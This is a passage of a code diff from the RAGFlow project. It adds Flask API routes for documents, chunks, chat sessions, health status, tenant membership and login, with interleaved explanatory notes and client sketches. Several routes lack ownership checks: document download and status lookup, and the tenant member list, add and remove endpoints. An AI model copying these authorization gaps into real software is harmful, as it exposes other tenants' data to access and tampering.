            e = DocumentService.increment_chunk_num(doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1,
                                                    doc.process_duation * -1)
            if not e:
                return get_data_error_result(retmsg="Document not found!")
            tenant_id = DocumentService.get_tenant_id(req["doc_id"])
            if not tenant_id:
                return get_data_error_result(retmsg="Tenant not found!")
            ELASTICSEARCH.deleteByQuery(
                Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))

        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/rename', methods=['POST'])
@login_required
@validate_request("doc_id", "name")
def rename():
    req = request.json
    try:
        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        if pathlib.Path(req["name"].lower()).suffix != pathlib.Path(
                doc.name.lower()).suffix:
            return get_json_result(
                data=False,
                retmsg="The extension of file can't be changed",
                retcode=RetCode.ARGUMENT_ERROR)
        for d in DocumentService.query(name=req["name"], kb_id=doc.kb_id):
            if d.name == req["name"]:
                return get_data_error_result(
                    retmsg="Duplicated document name in the same knowledgebase.")

        if not DocumentService.update_by_id(
                req["doc_id"], {"name": req["name"]}):
            return get_data_error_result(
                retmsg="Database error (Document rename)!")

        informs = File2DocumentService.get_by_document_id(req["doc_id"])
        if informs:
            e, file = FileService.get_by_id(informs[0].file_id)
            FileService.update_by_id(file.id, {"name": req["name"]})

        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route("/<document_id>", methods=["GET"])
@token_required
def download_document(tenant_id, document_id):
    # token_required injects tenant_id; the route itself only supplies document_id
    try:
        # Check whether this document exists
        exist, document = DocumentService.get_by_id(document_id)
        if not exist:
            return construct_json_result(message=f"This document '{document_id}' cannot be found!",
                                         code=RetCode.ARGUMENT_ERROR)

        # The process of downloading
        doc_id, doc_location = File2DocumentService.get_minio_address(doc_id=document_id)  # minio address
        file_stream = STORAGE_IMPL.get(doc_id, doc_location)
        if not file_stream:
            return construct_json_result(message="This file is empty.", code=RetCode.DATA_ERROR)

        file = BytesIO(file_stream)

        # Use send_file with a proper filename and MIME type
        return send_file(
            file,
            as_attachment=True,
            download_name=document.name,
            mimetype='application/octet-stream'  # Set a default MIME type
        )

    # Error
    except Exception as e:
        return construct_error_response(e)


@manager.route('/dataset/<dataset_id>/documents', methods=['GET'])
@token_required
def list_docs(dataset_id, tenant_id):
    kb_id = request.args.get("kb_id")
    if not kb_id:
        return get_json_result(
            data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
    tenants = UserTenantService.query(user_id=tenant_id)
    for tenant in tenants:
        if KnowledgebaseService.query(
                tenant_id=tenant.tenant_id, id=kb_id):
            break
    else:
        return get_json_result(
            data=False, retmsg='Only owner of knowledgebase authorized for this operation.',
            retcode=RetCode.OPERATING_ERROR)
    keywords = request.args.get("keywords", "")

    page_number = int(request.args.get("page", 1))
    items_per_page = int(request.args.get("page_size", 15))
    orderby = request.args.get("orderby", "create_time")
    desc = request.args.get("desc", True)
    try:
        docs, tol = DocumentService.get_by_kb_id(
            kb_id, page_number, items_per_page, orderby, desc, keywords)
        return get_json_result(data={"total": tol, "docs": docs})
    except Exception as e:
        return server_error_response(e)


@manager.route('/delete', methods=['DELETE'])
@token_required
def rm(tenant_id):
    req = request.args
    if "doc_id" not in req:
        return get_data_error_result(
            retmsg="doc_id is required")
    doc_ids = req["doc_id"]
    if isinstance(doc_ids, str):
        doc_ids = [doc_ids]
    root_folder = FileService.get_root_folder(tenant_id)
    pf_id = root_folder["id"]
    FileService.init_knowledgebase_docs(pf_id, tenant_id)
    errors = ""
    for doc_id in doc_ids:
        try:
            e, doc = DocumentService.get_by_id(doc_id)
            if not e:
                return get_data_error_result(retmsg="Document not found!")
            tenant_id = DocumentService.get_tenant_id(doc_id)
            if not tenant_id:
                return get_data_error_result(retmsg="Tenant not found!")

            b, n = File2DocumentService.get_minio_address(doc_id=doc_id)

            if not DocumentService.remove_document(doc, tenant_id):
                return get_data_error_result(
                    retmsg="Database error (Document removal)!")

            f2d = File2DocumentService.get_by_document_id(doc_id)
            FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
            File2DocumentService.delete_by_document_id(doc_id)

            STORAGE_IMPL.rm(b, n)
        except Exception as e:
            errors += str(e)

    if errors:
        return get_json_result(data=False, retmsg=errors, retcode=RetCode.SERVER_ERROR)

    return get_json_result(data=True, retmsg="success")


@manager.route("/<document_id>/status", methods=["GET"])
@token_required
def show_parsing_status(tenant_id, document_id):
    try:
        # validate the document
        exist, _ = DocumentService.get_by_id(document_id)
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR,
                                         message=f"This document: '{document_id}' is not a valid document.")

        _, doc = DocumentService.get_by_id(document_id)  # get doc object
        doc_attributes = doc.to_dict()

        return construct_json_result(
            data={"progress": doc_attributes["progress"], "status": TaskStatus(doc_attributes["status"]).name},
            code=RetCode.SUCCESS
        )
    except Exception as e:
        return construct_error_response(e)

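Together, the upload route and the status route above give the usual ingest-then-poll flow. A hedged client sketch; the base URL, the /v1/doc mount point, the Bearer header format, and the JSON envelope returned by construct_json_result are assumptions:

# Hedged sketch, not part of this diff: upload a file, then poll parsing status.
import time
import requests

BASE = "http://localhost:9380/v1/doc"            # assumed mount point
HEADERS = {"Authorization": "Bearer <API_KEY>"}  # assumed token format

with open("report.pdf", "rb") as f:
    r = requests.post(f"{BASE}/dataset/<dataset_id>/documents/upload",
                      files={"file": f}, headers=HEADERS)
assert r.json().get("data") is True

doc_id = "<document_id>"  # e.g. resolved via /infos?name=report.pdf
while True:
    s = requests.get(f"{BASE}/{doc_id}/status", headers=HEADERS).json()
    state = s.get("data", {})                    # envelope shape is an assumption
    if state.get("status") != "RUNNING":
        break
    time.sleep(2)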
@manager.route('/run', methods=['POST'])
@token_required
def run(tenant_id):
    req = request.json
    try:
        for id in req["doc_ids"]:
            info = {"run": str(req["run"]), "progress": 0}
            if str(req["run"]) == TaskStatus.RUNNING.value:
                info["progress_msg"] = ""
                info["chunk_num"] = 0
                info["token_num"] = 0
            DocumentService.update_by_id(id, info)
            # if str(req["run"]) == TaskStatus.CANCEL.value:
            tenant_id = DocumentService.get_tenant_id(id)
            if not tenant_id:
                return get_data_error_result(retmsg="Tenant not found!")
            ELASTICSEARCH.deleteByQuery(
                Q("match", doc_id=id), idxnm=search.index_name(tenant_id))

            if str(req["run"]) == TaskStatus.RUNNING.value:
                TaskService.filter_delete([Task.doc_id == id])
                e, doc = DocumentService.get_by_id(id)
                doc = doc.to_dict()
                doc["tenant_id"] = tenant_id
                bucket, name = File2DocumentService.get_minio_address(doc_id=doc["id"])
                queue_tasks(doc, bucket, name)

        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/chunk/list', methods=['POST'])
@token_required
@validate_request("doc_id")
def list_chunk(tenant_id):
    req = request.json
    doc_id = req["doc_id"]
    page = int(req.get("page", 1))
    size = int(req.get("size", 30))
    question = req.get("keywords", "")
    try:
        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
        if not tenant_id:
            return get_data_error_result(retmsg="Tenant not found!")
        e, doc = DocumentService.get_by_id(doc_id)
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        query = {
            "doc_ids": [doc_id], "page": page, "size": size, "question": question, "sort": True
        }
        if "available_int" in req:
            query["available_int"] = int(req["available_int"])
        sres = retrievaler.search(query, search.index_name(tenant_id), highlight=True)
        res = {"total": sres.total, "chunks": [], "doc": doc.to_dict()}
        for id in sres.ids:
            d = {
                "chunk_id": id,
                "content_with_weight": rmSpace(sres.highlight[id]) if question and id in sres.highlight else sres.field[
                    id].get(
                    "content_with_weight", ""),
                "doc_id": sres.field[id]["doc_id"],
                "docnm_kwd": sres.field[id]["docnm_kwd"],
                "important_kwd": sres.field[id].get("important_kwd", []),
                "img_id": sres.field[id].get("img_id", ""),
                "available_int": sres.field[id].get("available_int", 1),
                "positions": sres.field[id].get("position_int", "").split("\t")
            }
            if len(d["positions"]) % 5 == 0:
                poss = []
                for i in range(0, len(d["positions"]), 5):
                    poss.append([float(d["positions"][i]), float(d["positions"][i + 1]), float(d["positions"][i + 2]),
                                 float(d["positions"][i + 3]), float(d["positions"][i + 4])])
                d["positions"] = poss
            res["chunks"].append(d)
        return get_json_result(data=res)
    except Exception as e:
        if str(e).find("not_found") > 0:
            return get_json_result(data=False, retmsg='No chunk found!',
                                   retcode=RetCode.DATA_ERROR)
        return server_error_response(e)


@manager.route('/chunk/create', methods=['POST'])
@token_required
@validate_request("doc_id", "content_with_weight")
def create(tenant_id):
    req = request.json
    md5 = hashlib.md5()
    md5.update((req["content_with_weight"] + req["doc_id"]).encode("utf-8"))
    chunk_id = md5.hexdigest()
    d = {"id": chunk_id, "content_ltks": rag_tokenizer.tokenize(req["content_with_weight"]),
         "content_with_weight": req["content_with_weight"]}
    d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
    d["important_kwd"] = req.get("important_kwd", [])
    d["important_tks"] = rag_tokenizer.tokenize(" ".join(req.get("important_kwd", [])))
    d["create_time"] = str(datetime.datetime.now()).replace("T", " ")[:19]
    d["create_timestamp_flt"] = datetime.datetime.now().timestamp()

    try:
        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        d["kb_id"] = [doc.kb_id]
        d["docnm_kwd"] = doc.name
        d["doc_id"] = doc.id

        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
        if not tenant_id:
            return get_data_error_result(retmsg="Tenant not found!")

        embd_id = DocumentService.get_embd_id(req["doc_id"])
        embd_mdl = TenantLLMService.model_instance(
            tenant_id, LLMType.EMBEDDING.value, embd_id)

        # blend the document-title and chunk-content embeddings 1:9
        v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
        v = 0.1 * v[0] + 0.9 * v[1]
        d["q_%d_vec" % len(v)] = v.tolist()
        ELASTICSEARCH.upsert([d], search.index_name(tenant_id))

        DocumentService.increment_chunk_num(
            doc.id, doc.kb_id, c, 1, 0)
        return get_json_result(data={"chunk": d})
        # return get_json_result(data={"chunk_id": chunk_id})
    except Exception as e:
        return server_error_response(e)


@manager.route('/chunk/rm', methods=['POST'])
@token_required
@validate_request("chunk_ids", "doc_id")
def rm_chunk(tenant_id):
    # token_required injects tenant_id, so use it for the index name;
    # current_user is only populated under session login, not token auth
    req = request.json
    try:
        if not ELASTICSEARCH.deleteByQuery(
                Q("ids", values=req["chunk_ids"]), search.index_name(tenant_id)):
            return get_data_error_result(retmsg="Index updating failure")
        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        deleted_chunk_ids = req["chunk_ids"]
        chunk_number = len(deleted_chunk_ids)
        DocumentService.decrement_chunk_num(doc.id, doc.kb_id, 1, chunk_number, 0)
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
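list_chunk above returns each chunk's positions as a tab-separated string of numbers in groups of five, which the handler regroups into 5-element lists. The same regrouping in isolation; the semantic order of the five numbers (page number plus box coordinates) is an assumption, not stated in this diff:

# Regroup a flat, tab-separated position string into 5-number groups,
# mirroring the loop in list_chunk above.
def decode_positions(position_int: str):
    parts = position_int.split("\t")
    if not position_int or len(parts) % 5 != 0:
        return []
    nums = [float(p) for p in parts]
    return [nums[i:i + 5] for i in range(0, len(nums), 5)]

assert decode_positions("1\t10\t200\t30\t60") == [[1.0, 10.0, 200.0, 30.0, 60.0]]
assert decode_positions("") == []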
263
api/apps/sdk/session.py
Normal file
@ -0,0 +1,263 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import json
from uuid import uuid4

from flask import request, Response

from api.db import StatusEnum
from api.db.services.dialog_service import DialogService, ConversationService, chat
from api.settings import RetCode
from api.utils import get_uuid
from api.utils.api_utils import get_data_error_result
from api.utils.api_utils import get_json_result, token_required


@manager.route('/save', methods=['POST'])
@token_required
def set_conversation(tenant_id):
    req = request.json
    conv_id = req.get("id")
    if "assistant_id" in req:
        req["dialog_id"] = req.pop("assistant_id")
    if "id" in req:
        del req["id"]
        conv = ConversationService.query(id=conv_id)
        if not conv:
            return get_data_error_result(retmsg="Session does not exist")
        if not DialogService.query(id=conv[0].dialog_id, tenant_id=tenant_id, status=StatusEnum.VALID.value):
            return get_data_error_result(retmsg="You do not own the session")
        if req.get("dialog_id"):
            dia = DialogService.query(tenant_id=tenant_id, id=req["dialog_id"], status=StatusEnum.VALID.value)
            if not dia:
                return get_data_error_result(retmsg="You do not own the assistant")
        if "dialog_id" in req and not req.get("dialog_id"):
            return get_data_error_result(retmsg="assistant_id cannot be empty.")
        if "message" in req:
            return get_data_error_result(retmsg="message cannot be changed")
        if "reference" in req:
            return get_data_error_result(retmsg="reference cannot be changed")
        if "name" in req and not req.get("name"):
            return get_data_error_result(retmsg="name cannot be empty.")
        if not ConversationService.update_by_id(conv_id, req):
            return get_data_error_result(retmsg="Session update error")
        return get_json_result(data=True)

    if not req.get("dialog_id"):
        return get_data_error_result(retmsg="assistant_id is required.")
    dia = DialogService.query(tenant_id=tenant_id, id=req["dialog_id"], status=StatusEnum.VALID.value)
    if not dia:
        return get_data_error_result(retmsg="You do not own the assistant")
    conv = {
        "id": get_uuid(),
        "dialog_id": req["dialog_id"],
        "name": req.get("name", "New session"),
        "message": [{"role": "assistant", "content": "Hi! I am your assistant, can I help you?"}]
    }
    if not conv.get("name"):
        return get_data_error_result(retmsg="name cannot be empty.")
    ConversationService.save(**conv)
    e, conv = ConversationService.get_by_id(conv["id"])
    if not e:
        return get_data_error_result(retmsg="Failed to create a session!")
    conv = conv.to_dict()
    conv['messages'] = conv.pop("message")
    conv["assistant_id"] = conv.pop("dialog_id")
    del conv["reference"]
    return get_json_result(data=conv)


@manager.route('/completion', methods=['POST'])
@token_required
def completion(tenant_id):
    req = request.json
    # req = {"conversation_id": "9aaaca4c11d311efa461fa163e197198", "messages": [
    #     {"role": "user", "content": "上海有吗?"}
    # ]}
    if "id" not in req:
        return get_data_error_result(retmsg="id is required")
    conv = ConversationService.query(id=req["id"])
    if not conv:
        return get_data_error_result(retmsg="Session does not exist")
    conv = conv[0]
    if not DialogService.query(id=conv.dialog_id, tenant_id=tenant_id, status=StatusEnum.VALID.value):
        return get_data_error_result(retmsg="You do not own the session")
    msg = []
    question = {
        "content": req.get("question"),
        "role": "user",
        "id": str(uuid4())
    }
    conv.message.append(question)
    for m in conv.message:
        if m["role"] == "system":
            continue
        if m["role"] == "assistant" and not msg:
            continue
        msg.append(m)
    message_id = msg[-1].get("id")
    e, dia = DialogService.get_by_id(conv.dialog_id)
    del req["id"]

    if not conv.reference:
        conv.reference = []
    conv.message.append({"role": "assistant", "content": "", "id": message_id})
    conv.reference.append({"chunks": [], "doc_aggs": []})

    def fillin_conv(ans):
        nonlocal conv, message_id
        if not conv.reference:
            conv.reference.append(ans["reference"])
        else:
            conv.reference[-1] = ans["reference"]
        conv.message[-1] = {"role": "assistant", "content": ans["answer"],
                            "id": message_id, "prompt": ans.get("prompt", "")}
        ans["id"] = message_id

    def stream():
        nonlocal dia, msg, req, conv
        try:
            for ans in chat(dia, msg, **req):
                fillin_conv(ans)
                yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
            ConversationService.update_by_id(conv.id, conv.to_dict())
        except Exception as e:
            yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
                                        "data": {"answer": "**ERROR**: " + str(e), "reference": []}},
                                       ensure_ascii=False) + "\n\n"
        yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"

    if req.get("stream", True):
        resp = Response(stream(), mimetype="text/event-stream")
        resp.headers.add_header("Cache-control", "no-cache")
        resp.headers.add_header("Connection", "keep-alive")
        resp.headers.add_header("X-Accel-Buffering", "no")
        resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
        return resp

    else:
        answer = None
        for ans in chat(dia, msg, **req):
            answer = ans
            fillin_conv(ans)
            ConversationService.update_by_id(conv.id, conv.to_dict())
            break
        return get_json_result(data=answer)


@manager.route('/get', methods=['GET'])
@token_required
def get(tenant_id):
    req = request.args
    if "id" not in req:
        return get_data_error_result(retmsg="id is required")
    conv_id = req["id"]
    conv = ConversationService.query(id=conv_id)
    if not conv:
        return get_data_error_result(retmsg="Session does not exist")
    if not DialogService.query(id=conv[0].dialog_id, tenant_id=tenant_id, status=StatusEnum.VALID.value):
        return get_data_error_result(retmsg="You do not own the session")
    conv = conv[0].to_dict()
    conv['messages'] = conv.pop("message")
    conv["assistant_id"] = conv.pop("dialog_id")
    if conv["reference"]:
        messages = conv["messages"]
        message_num = 0
        chunk_num = 0
        while message_num < len(messages):
            if message_num != 0 and messages[message_num]["role"] != "user":
                chunk_list = []
                if "chunks" in conv["reference"][chunk_num]:
                    chunks = conv["reference"][chunk_num]["chunks"]
                    for chunk in chunks:
                        new_chunk = {
                            "id": chunk["chunk_id"],
                            "content": chunk["content_with_weight"],
                            "document_id": chunk["doc_id"],
                            "document_name": chunk["docnm_kwd"],
                            "knowledgebase_id": chunk["kb_id"],
                            "image_id": chunk["img_id"],
                            "similarity": chunk["similarity"],
                            "vector_similarity": chunk["vector_similarity"],
                            "term_similarity": chunk["term_similarity"],
                            "positions": chunk["positions"],
                        }
                        chunk_list.append(new_chunk)
                chunk_num += 1
                messages[message_num]["reference"] = chunk_list
            message_num += 1
    del conv["reference"]
    return get_json_result(data=conv)


@manager.route('/list', methods=["GET"])
@token_required
def list(tenant_id):
    assistant_id = request.args["assistant_id"]
    if not DialogService.query(tenant_id=tenant_id, id=assistant_id, status=StatusEnum.VALID.value):
        return get_json_result(
            data=False, retmsg='Only owner of the assistant is authorized for this operation.',
            retcode=RetCode.OPERATING_ERROR)
    convs = ConversationService.query(
        dialog_id=assistant_id,
        order_by=ConversationService.model.create_time,
        reverse=True)
    convs = [d.to_dict() for d in convs]
    for conv in convs:
        conv['messages'] = conv.pop("message")
        conv["assistant_id"] = conv.pop("dialog_id")
        if conv["reference"]:
            messages = conv["messages"]
            message_num = 0
            chunk_num = 0
            while message_num < len(messages):
                if message_num != 0 and messages[message_num]["role"] != "user":
                    chunk_list = []
                    if "chunks" in conv["reference"][chunk_num]:
                        chunks = conv["reference"][chunk_num]["chunks"]
                        for chunk in chunks:
                            new_chunk = {
                                "id": chunk["chunk_id"],
                                "content": chunk["content_with_weight"],
                                "document_id": chunk["doc_id"],
                                "document_name": chunk["docnm_kwd"],
                                "knowledgebase_id": chunk["kb_id"],
                                "image_id": chunk["img_id"],
                                "similarity": chunk["similarity"],
                                "vector_similarity": chunk["vector_similarity"],
                                "term_similarity": chunk["term_similarity"],
                                "positions": chunk["positions"],
                            }
                            chunk_list.append(new_chunk)
                    chunk_num += 1
                    messages[message_num]["reference"] = chunk_list
                message_num += 1
        del conv["reference"]
    return get_json_result(data=convs)


@manager.route('/delete', methods=["DELETE"])
@token_required
def delete(tenant_id):
    id = request.args.get("id")
    if not id:
        return get_data_error_result(retmsg="`id` is required in deleting operation")
    conv = ConversationService.query(id=id)
    if not conv:
        return get_data_error_result(retmsg="Session doesn't exist")
    conv = conv[0]
    if not DialogService.query(id=conv.dialog_id, tenant_id=tenant_id, status=StatusEnum.VALID.value):
        return get_data_error_result(retmsg="You don't own the session")
    ConversationService.delete_by_id(id)
    return get_json_result(data=True)
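The stream() generator above frames each event as "data:" plus a JSON payload and ends with a sentinel whose data field is True. A hedged sketch of consuming that stream; the base URL, the /v1/session mount point, and the Bearer header format are assumptions, while the framing matches the handler above:

# Hedged sketch, not part of this diff: read /completion as a text/event-stream.
import json
import requests

BASE = "http://localhost:9380/v1/session"        # assumed mount point
HEADERS = {"Authorization": "Bearer <API_KEY>"}  # assumed token format

with requests.post(f"{BASE}/completion",
                   json={"id": "<session_id>", "question": "What is RAGFlow?", "stream": True},
                   headers=HEADERS, stream=True) as r:
    for line in r.iter_lines(decode_unicode=True):
        if not line or not line.startswith("data:"):
            continue
        event = json.loads(line[len("data:"):])
        if event["data"] is True:    # final sentinel emitted by stream()
            break
        print(event["data"]["answer"])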
@ -13,6 +13,8 @@
#  See the License for the specific language governing permissions and
#  limitations under the License
#
import json

from flask_login import login_required

from api.db.services.knowledgebase_service import KnowledgebaseService
@ -20,7 +22,7 @@ from api.utils.api_utils import get_json_result
from api.versions import get_rag_version
from rag.settings import SVR_QUEUE_NAME
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils.minio_conn import MINIO
from rag.utils.storage_factory import STORAGE_IMPL
from timeit import default_timer as timer

from rag.utils.redis_conn import REDIS_CONN
@ -45,7 +47,7 @@ def status():

    st = timer()
    try:
        MINIO.health()
        STORAGE_IMPL.health()
        res["minio"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.)}
    except Exception as e:
        res["minio"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
@ -59,9 +61,29 @@ def status():

    st = timer()
    try:
        qinfo = REDIS_CONN.health(SVR_QUEUE_NAME)
        res["redis"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.), "pending": qinfo["pending"]}
        if not REDIS_CONN.health():
            raise Exception("Lost connection!")
        res["redis"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.)}
    except Exception as e:
        res["redis"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}

    try:
        v = REDIS_CONN.get("TASKEXE")
        if not v:
            raise Exception("No task executor running!")
        obj = json.loads(v)
        color = "green"
        for id in obj.keys():
            arr = obj[id]
            if len(arr) == 1:
                obj[id] = [0]
            else:
                obj[id] = [arr[i+1]-arr[i] for i in range(len(arr)-1)]
            elapsed = max(obj[id])
            if elapsed > 50: color = "yellow"
            if elapsed > 120: color = "red"
        res["task_executor"] = {"status": color, "elapsed": obj}
    except Exception as e:
        res["task_executor"] = {"status": "red", "error": str(e)}

    return get_json_result(data=res)
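The task_executor check above reads a heartbeat map from Redis and turns each executor's timestamp list into consecutive gaps, turning the status yellow past 50 and red past 120 (the unit depends on how the executor stores its timestamps; seconds is an assumption here). The same gap computation in isolation:

# Consecutive-gap computation behind the task_executor health colour above.
def heartbeat_gaps(timestamps):
    if len(timestamps) == 1:
        return [0]
    return [timestamps[i + 1] - timestamps[i] for i in range(len(timestamps) - 1)]

gaps = heartbeat_gaps([100, 130, 190])   # -> [30, 60]
color = "green"
if max(gaps) > 50:
    color = "yellow"
if max(gaps) > 120:
    color = "red"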
85
api/apps/tenant_app.py
Normal file
@ -0,0 +1,85 @@
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from flask import request
|
||||
from flask_login import current_user, login_required
|
||||
|
||||
from api.db import UserTenantRole, StatusEnum
|
||||
from api.db.db_models import UserTenant
|
||||
from api.db.services.user_service import TenantService, UserTenantService
|
||||
from api.settings import RetCode
|
||||
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import get_json_result, validate_request, server_error_response
|
||||
|
||||
|
||||
@manager.route("/list", methods=["GET"])
|
||||
@login_required
|
||||
def tenant_list():
|
||||
try:
|
||||
tenants = TenantService.get_by_user_id(current_user.id)
|
||||
return get_json_result(data=tenants)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route("/<tenant_id>/user/list", methods=["GET"])
|
||||
@login_required
|
||||
def user_list(tenant_id):
|
||||
try:
|
||||
users = UserTenantService.get_by_tenant_id(tenant_id)
|
||||
return get_json_result(data=users)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/<tenant_id>/user', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("user_id")
|
||||
def create(tenant_id):
|
||||
user_id = request.json.get("user_id")
|
||||
if not user_id:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "USER ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
try:
|
||||
user_tenants = UserTenantService.query(user_id=user_id, tenant_id=tenant_id)
|
||||
if user_tenants:
|
||||
uuid = user_tenants[0].id
|
||||
return get_json_result(data={"id": uuid})
|
||||
|
||||
uuid = get_uuid()
|
||||
UserTenantService.save(
|
||||
id = uuid,
|
||||
user_id = user_id,
|
||||
tenant_id = tenant_id,
|
||||
role = UserTenantRole.NORMAL.value,
|
||||
status = StatusEnum.VALID.value)
|
||||
|
||||
return get_json_result(data={"id": uuid})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/<tenant_id>/user/<user_id>', methods=['DELETE'])
|
||||
@login_required
|
||||
def rm(tenant_id, user_id):
|
||||
try:
|
||||
UserTenantService.filter_delete([UserTenant.tenant_id == tenant_id, UserTenant.user_id == user_id])
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
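The new tenant_app.py gives tenant membership a small CRUD surface. Note that create() is idempotent: if the (user_id, tenant_id) pair already exists, it returns the existing record's id instead of inserting a duplicate. A hedged client sketch follows; the /v1/tenant mount point and the Authorization header are assumptions about the deployment, not stated in this file.

    import requests

    BASE = "http://localhost:9380/v1/tenant"   # assumed default address
    HEADERS = {"Authorization": "<auth token obtained at login>"}

    def add_member(tenant_id: str, user_id: str) -> str:
        # POST /<tenant_id>/user returns the membership id; repeating the
        # call with the same pair returns the same id (idempotent create).
        r = requests.post(f"{BASE}/{tenant_id}/user",
                          json={"user_id": user_id}, headers=HEADERS, timeout=5)
        r.raise_for_status()
        return r.json()["data"]["id"]

    def list_members(tenant_id: str) -> list:
        r = requests.get(f"{BASE}/{tenant_id}/user/list", headers=HEADERS, timeout=5)
        r.raise_for_status()
        return r.json()["data"]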
@@ -1,388 +1,422 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re
from datetime import datetime

from flask import request, session, redirect
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import login_required, current_user, login_user, logout_user

from api.db.db_models import TenantLLM
from api.db.services.llm_service import TenantLLMService, LLMService
from api.utils.api_utils import server_error_response, validate_request
from api.utils import get_uuid, get_format_time, decrypt, download_img, current_timestamp, datetime_format
from api.db import UserTenantRole, LLMType, FileType
from api.settings import RetCode, GITHUB_OAUTH, CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, API_KEY, \
    LLM_FACTORY, LLM_BASE_URL
from api.db.services.user_service import UserService, TenantService, UserTenantService
from api.db.services.file_service import FileService
from api.settings import stat_logger
from api.utils.api_utils import get_json_result, cors_reponse


@manager.route('/login', methods=['POST', 'GET'])
def login():
    login_channel = "password"
    if not request.json:
        return get_json_result(data=False, retcode=RetCode.AUTHENTICATION_ERROR,
                               retmsg='Unautherized!')

    email = request.json.get('email', "")
    users = UserService.query(email=email)
    if not users:
        return get_json_result(
            data=False, retcode=RetCode.AUTHENTICATION_ERROR, retmsg=f'This Email is not registered!')

    password = request.json.get('password')
    try:
        password = decrypt(password)
    except BaseException:
        return get_json_result(
            data=False, retcode=RetCode.SERVER_ERROR, retmsg='Fail to crypt password')

    user = UserService.query_user(email, password)
    if user:
        response_data = user.to_json()
        user.access_token = get_uuid()
        login_user(user)
        user.update_time = current_timestamp(),
        user.update_date = datetime_format(datetime.now()),
        user.save()
        msg = "Welcome back!"
        return cors_reponse(data=response_data, auth=user.get_id(), retmsg=msg)
    else:
        return get_json_result(data=False, retcode=RetCode.AUTHENTICATION_ERROR,
                               retmsg='Email and Password do not match!')


@manager.route('/github_callback', methods=['GET'])
def github_callback():
    import requests
    res = requests.post(GITHUB_OAUTH.get("url"), data={
        "client_id": GITHUB_OAUTH.get("client_id"),
        "client_secret": GITHUB_OAUTH.get("secret_key"),
        "code": request.args.get('code')
    }, headers={"Accept": "application/json"})
    res = res.json()
    if "error" in res:
        return redirect("/?error=%s" % res["error_description"])

    if "user:email" not in res["scope"].split(","):
        return redirect("/?error=user:email not in scope")

    session["access_token"] = res["access_token"]
    session["access_token_from"] = "github"
    userinfo = user_info_from_github(session["access_token"])
    users = UserService.query(email=userinfo["email"])
    user_id = get_uuid()
    if not users:
        try:
            try:
                avatar = download_img(userinfo["avatar_url"])
            except Exception as e:
                stat_logger.exception(e)
                avatar = ""
            users = user_register(user_id, {
                "access_token": session["access_token"],
